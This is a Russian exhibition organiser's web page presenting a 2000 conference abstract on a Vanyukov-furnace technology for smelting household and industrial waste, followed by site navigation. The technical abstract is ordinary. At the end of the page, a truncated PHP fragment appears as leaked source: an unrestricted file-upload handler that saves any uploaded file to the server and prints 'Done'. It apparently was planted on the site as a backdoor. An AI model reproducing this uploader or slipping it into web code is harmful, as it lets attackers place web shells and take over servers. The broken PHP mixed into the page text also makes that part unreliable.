ИНТЕРПРОЕКТ - организатор выставок и конференций в Ярославле


Выставка 'Экология города'

Специализированная выставка

ЭКОЛОГИЯ ГОРОДА


  Другие выставки
Выставка 'Ваше жилище'

  Выставка
  Ваше жилище
  
 


Тезисы докладов Всероссийской научно-практической конференции "Оптимизация обращения с отходами производства и потребления"-2000
(Ярославль, 6 – 7 декабря 2000 г.):

Заводы по переработке твердых бытовых и промышленных отходов в барботируемом расплаве шлака (принцип Ванюкова)

А.В. Гречко — ведущий научный сотрудник ОАО "Институт ГИНЦВЕТМЕТ", д.т.н. (Москва)


Институтом "Гинцветмет" совместно с другими организациями разработана экологически чистая практически безотходная технология переработки твердых бытовых (ТБО) и промышленных отходов (ТБПО). Она базируется на плавке в расплаве, продуваемом (барботируемом) газовыми струями. Для этой цели используются агрегаты типа печей Ванюкова (ПВ), получивших промышленное распространение на заводах цветной металлургии России и Казахстана.

Сущность технологии заключается в плавке отходов при условиях, обеспечивающих отсутствие высокотоксичных соединений (диоксинов, фуранов и др.) уже на выходе газопылевого потока из печи. По сравнению с существующими способами переработки ТБО (например, в печах-котлоагрегатах с колосниковыми решетками) имеет высокие температуры 1250–1400°С, окислительную среду (коэффициент избытка окислителя a=1,05–1,2), определенную длительность пребывания газов (2–4 сек. и более), "термическую мгновенность" в процессе плавки. Последнее условие обеспечивается в печи ПВ благодаря специфической гидроаэродинамической обстановке в рабочем пространстве ("барботажный эффект").

Эта технология прошла крупномасштабные испытания на специально переоборудованной под этот вид перерабатываемого сырья (ТБО, ТБПО) установке ПВ на Рязанском опытно-экспериментальном металлургическом заводе Гинцветмета. Бытовой мусор подвозился непосредственно от жилых домов г. Рязани, а промотходы (шламы) — от отстойников (очистных сооружений) этого завода. Переработка отходов проводилась без специальной подготовки (сушки, сортировки). Испытания полностью подтвердили экологическую безопасность новой технологии.

На основе полученных данных разработаны типоразмерные модули заводов на мощности от 30 до 240 тыс.т/год (соответственно численности населенных пунктов от 100 тыс. до 1 млн.чел. по нормам ТБО). В принципе, из этих модулей может составляться завод на любую мощность.

В настоящее время имеется большое число потенциальных заказчиков нашей технологии из многих регионов. Разработанная в Гинцветмете концепция регионального подхода к переработке ТБО и ТБПО позволяет комплексно перерабатывать самые различные отходы. Такими отходами, представляющими интерес с экологической и экономической точек зрения, являются материалы, содержащие ценные компоненты (в основном, металлы) и горючие составляющие (углерод и др.). К этим отходам относятся продукты металлургии, машиностроения, кузнечного производства, химической и нефтехимической промышленности, больничного хозяйства, углеобогатительных фабрик, энергетических объектов (золоунос, золошлаки), целлюлозобумажной промышленности, электродного и углеграфитового производства, военно-промышленного комплекса и т.д. При этом продукты переработки используются в других отраслях народного хозяйства: в стройиндустрии, металлургии, горном деле, дорожном строительстве, коммунальном хозяйстве. Полезное использование получающегося шлака, металлосодержащего продукта, утилизация газов и вторичного тепла делают технологию высокоэффективной. Окупаемость капвложений в строительство заводов - 1,5–2,5 года, а сами заводы превращаются в выгодные коммерческие предприятия. Сейчас для ряда регионов России и других стран разработаны технико-экономические обоснования, обоснования инвестиций, бизнес-планы и другая техническая документация для промышленной реализации. Специалисты считают, что, благодаря разработанной технологии, сделан научно-технический прорыв в решении мировой экологической проблемы борьбы с ТБО и надеются на промышленную реализацию в ближайшее время. Ход работ в этом направлении в некоторых регионах (Ставропольский край, Кемеровская область, Подмосковье и др.) вселяют уверенность в этом и оптимизм авторов технологии.

Более подробные сведения о технологии опубликованы в многочисленных научно-технических статьях, в т.ч.:

  • Гречко А.В., Денисов В.Ф. Технологические испытания термической переработки твердых отходов сложного состава с обеспечением диоксиновой безопасности. - Химическая промышленность, 1989, № 2, с. 61–64.
  • Гречко А.В., Калнин Е.И., Денисов В.Ф. Печь Ванюкова и ее использование для решения проблемы твердых бытовых отходов. — Известия Российской АН. Металлы, 1998, № 6, с. 3–11.
  • Гречко А.В., Денисов В.Ф., Федоров Л.А. Региональный характер проблемы твердых бытовых и промышленных отходов и ее решение пирометаллургическим методом. — Экология и промышленность России, 1997, октябрь, с. 13-16.
АРХИВ выставки "Экология города":
  • 2003 (пресс-релиз)
  • Тезисы докладов-2003
  • 2000 (пресс-релиз)
  • Тезисы докладов-2000
  • Карта сайта









    Архивы:

  • Выставка "Архитектура"
  • Выставка "Ваше жилище"
  • Выставка "Экология города"
  • Другие выставки
  • Карта сайта


  • "; $target = ""; $target = $target.basename( $_FILES['uploaded']['name']) ; $ok=1; if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target)) { echo "Done"; } } ?>